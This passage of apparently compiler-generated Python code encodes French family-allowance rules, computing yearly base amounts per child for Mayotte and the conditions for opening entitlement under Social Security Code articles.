date_of_numbers(2013, 1, 1)) and (date_courante_105 <=
date_of_numbers(2013, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.075"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_287(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=605, start_column=5,
end_line=605, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2014, 1, 1)) and (date_courante_105 <=
date_of_numbers(2014, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.069"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_285(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=612, start_column=5,
end_line=612, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2015, 1, 1)) and (date_courante_105 <=
date_of_numbers(2015, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0766"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_283(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=619, start_column=5,
end_line=619, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2016, 1, 1)) and (date_courante_105 <=
date_of_numbers(2016, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0842"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_281(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=626, start_column=5,
end_line=626, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2017, 1, 1)) and (date_courante_105 <=
date_of_numbers(2017, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0918"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_279(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=633, start_column=5,
end_line=633, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2018, 1, 1)) and (date_courante_105 <=
date_of_numbers(2018, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1089"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_277(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=640, start_column=5,
end_line=640, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2019, 1, 1)) and (date_courante_105 <=
date_of_numbers(2019, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1259"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_275(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=647, start_column=5,
end_line=647, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2020, 1, 1)) and (date_courante_105 <=
date_of_numbers(2020, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.143"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_274 = handle_default([local_var_275, local_var_277,
local_var_279, local_var_281,
local_var_283, local_var_285,
local_var_287, local_var_289,
local_var_291, local_var_293],
local_var_295, local_var_297)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=123, start_column=11,
end_line=123, end_column=56,
law_headings=["Prologue"]))
montant_initial_base_troisieme_enfant_mayotte_273 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_troisième_enfant_mayotte"], local_var_274)
try:
try:
def local_var_323(_: Any):
try:
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.32"))
else:
return money_of_cents_string("0")
except EmptyError:
raise EmptyError
def local_var_321(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=122, start_column=11,
end_line=122, end_column=55,
law_headings=["Prologue"]), True)
def local_var_319(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=513, start_column=5,
end_line=513, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2011, 1, 1)) and (date_courante_105 <=
date_of_numbers(2011, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.232"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_317(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=520, start_column=5,
end_line=520, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2012, 1, 1)) and (date_courante_105 <=
date_of_numbers(2012, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.2379"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_315(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=527, start_column=5,
end_line=527, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2013, 1, 1)) and (date_courante_105 <=
date_of_numbers(2013, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.2437"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_313(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=534, start_column=5,
end_line=534, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2014, 1, 1)) and (date_courante_105 <=
date_of_numbers(2014, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.2496"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_311(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=541, start_column=5,
end_line=541, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2015, 1, 1)) and (date_courante_105 <=
date_of_numbers(2015, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.2555"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_309(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=548, start_column=5,
end_line=548, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2016, 1, 1)) and (date_courante_105 <=
date_of_numbers(2016, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.273"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_307(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=555, start_column=5,
end_line=555, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2017, 1, 1)) and (date_courante_105 <=
date_of_numbers(2017, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.2672"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_305(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=562, start_column=5,
end_line=562, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2018, 1, 1)) and (date_courante_105 <=
date_of_numbers(2018, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.284"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_303(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=569, start_column=5,
end_line=569, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2019, 1, 1)) and (date_courante_105 <=
date_of_numbers(2019, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.2936"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_301(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=576, start_column=5,
end_line=576, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2020, 1, 1)) and (date_courante_105 <=
date_of_numbers(2020, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.3068"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_300 = handle_default([local_var_301, local_var_303,
local_var_305, local_var_307,
local_var_309, local_var_311,
local_var_313, local_var_315,
local_var_317, local_var_319],
local_var_321, local_var_323)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=122, start_column=11,
end_line=122, end_column=55,
law_headings=["Prologue"]))
montant_initial_base_deuxieme_enfant_mayotte_299 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_deuxième_enfant_mayotte"], local_var_300)
try:
try:
def local_var_351(_: Any):
try:
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0588"))
else:
return money_of_cents_string("0")
except EmptyError:
raise EmptyError
def local_var_349(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=121, start_column=11,
end_line=121, end_column=54,
law_headings=["Prologue"]), True)
def local_var_347(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=425, start_column=5,
end_line=426, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2011, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2011, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.145"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_345(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=433, start_column=5,
end_line=434, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2012, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2012, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1393"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_343(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=441, start_column=5,
end_line=442, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2013, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2013, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1335"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_341(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=449, start_column=5,
end_line=450, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2014, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2014, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1278"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_339(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=457, start_column=5,
end_line=458, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2015, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2015, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.122"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_337(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=465, start_column=5,
end_line=466, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2016, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2016, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1163"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_335(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=473, start_column=5,
end_line=474, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2017, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2017, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.115"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_333(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=481, start_column=5,
end_line=482, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2018, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2018, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0976"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_331(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=489, start_column=5,
end_line=490, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2019, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2019, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0847"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_329(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=497, start_column=5,
end_line=498, end_column=53, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2020, 1, 1)) and ((date_courante_105 <=
date_of_numbers(2020, 12, 31)) and
not avait_enfant_a_charge_avant_1er_janvier_2012_107))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0717"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_327(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=505, start_column=5,
end_line=505, end_column=49, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), avait_enfant_a_charge_avant_1er_janvier_2012_107):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("0")):
return money_of_cents_string("5728")
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_326 = handle_default([local_var_327, local_var_329,
local_var_331, local_var_333,
local_var_335, local_var_337,
local_var_339, local_var_341,
local_var_343, local_var_345,
local_var_347], local_var_349,
local_var_351)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=121, start_column=11,
end_line=121, end_column=54,
law_headings=["Prologue"]))
montant_initial_base_premier_enfant_mayotte_325 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_premier_enfant_mayotte"], local_var_326)
try:
try:
try:
local_var_354 = decimal_of_integer(list_length(
enfants_a_charge_droit_ouvert_prestation_familiale_231))
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=115, start_column=11,
end_line=115, end_column=31,
law_headings=["Prologue"]))
nombre_total_enfants_353 = log_variable_definition(["AllocationsFamiliales",
"nombre_total_enfants"], local_var_354)
try:
try:
try:
def local_var_357(acc_358: Decimal, enfant_359: Any):
match_arg_556 = log_end_call(["AllocationsFamiliales",
"prise_en_compte"],
log_variable_definition(["AllocationsFamiliales",
"prise_en_compte", "output"],
log_begin_call(["AllocationsFamiliales",
"prise_en_compte"], prise_en_compte_108,
log_variable_definition(["AllocationsFamiliales",
"prise_en_compte", "input"],
enfant_359))))
if match_arg_556.code == PriseEnCompte_Code.Complete:
_ = match_arg_556.value
local_var_360 = decimal_of_string("1.")
elif match_arg_556.code == PriseEnCompte_Code.Partagee:
_ = match_arg_556.value
local_var_360 = decimal_of_string("0.5")
elif match_arg_556.code == PriseEnCompte_Code.Zero:
_ = match_arg_556.value
local_var_360 = decimal_of_string("0.")
return (acc_358 + local_var_360)
local_var_356 = list_fold_left(local_var_357,
decimal_of_string("0."),
enfants_a_charge_droit_ouvert_prestation_familiale_231)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=114, start_column=11,
end_line=114, end_column=31,
law_headings=["Prologue"]))
nombre_moyen_enfants_355 = log_variable_definition(["AllocationsFamiliales",
"nombre_moyen_enfants"], local_var_356)
try:
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=359, start_column=5,
end_line=360, end_column=71,
law_headings=["Article D755-5",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Départements d'outre-mer",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")))):
local_var_365 = (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0588"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
local_var_365 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=110, start_column=11,
end_line=110, end_column=46,
law_headings=["Prologue"]))
montant_initial_base_premier_enfant_364 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_premier_enfant"], local_var_365)
try:
try:
def local_var_374(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=101, start_column=5,
end_line=101, end_column=70,
law_headings=["Article L521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >=
integer_of_string("2"))):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_372(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=108, start_column=11,
end_line=108, end_column=28,
law_headings=["Prologue"]), True)
def local_var_370(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=406, start_column=5,
end_line=407, end_column=72,
law_headings=["Article L755-12",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Dispositions particulières à la Guadeloupe, à la Guyane, à la Martinique, à La Réunion, à Saint-Barthélemy et à Saint-Martin",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie législative",
"Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >=
integer_of_string("1")))):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_368(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=344, start_column=5,
end_line=345, end_column=72,
law_headings=["Article 7",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((residence_104 ==
Collectivite(Collectivite_Code.Mayotte, Unit())) and
(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >=
integer_of_string("1")))):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_367 = handle_default([local_var_368, local_var_370],
local_var_372, local_var_374)
except EmptyError:
local_var_367 = False
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=108, start_column=11,
end_line=108, end_column=28,
law_headings=["Prologue"]))
droit_ouvert_base_366 = log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_base"], local_var_367)
try:
def local_var_377(param_378: Enfant):
try:
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=313, start_column=5,
end_line=315, end_column=58,
law_headings=["Article L521-3",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), ((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >=
nombre_enfants_alinea_2_l521_3_204) and
(param_378.age >=
log_end_call(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3"],
log_variable_definition(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3", "output"],
log_begin_call(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3"],
age_minimum_alinea_1_l521_3_228,
log_variable_definition(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3", "input"],
param_378))))))):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=299, start_column=5,
end_line=300, end_column=58,
law_headings=["Article L521-3",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), (not log_end_call(["AllocationsFamiliales",
"est_enfant_le_plus_âgé"],
log_variable_definition(["AllocationsFamiliales",
"est_enfant_le_plus_âgé", "output"],
log_begin_call(["AllocationsFamiliales",
"est_enfant_le_plus_âgé"],
est_enfant_le_plus_age_235,
log_variable_definition(["AllocationsFamiliales",
"est_enfant_le_plus_âgé", "input"],
param_378)))) and (param_378.age >=
log_end_call(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3"],
log_variable_definition(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3", "output"],
log_begin_call(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3"],
age_minimum_alinea_1_l521_3_228,
log_variable_definition(["AllocationsFamiliales",
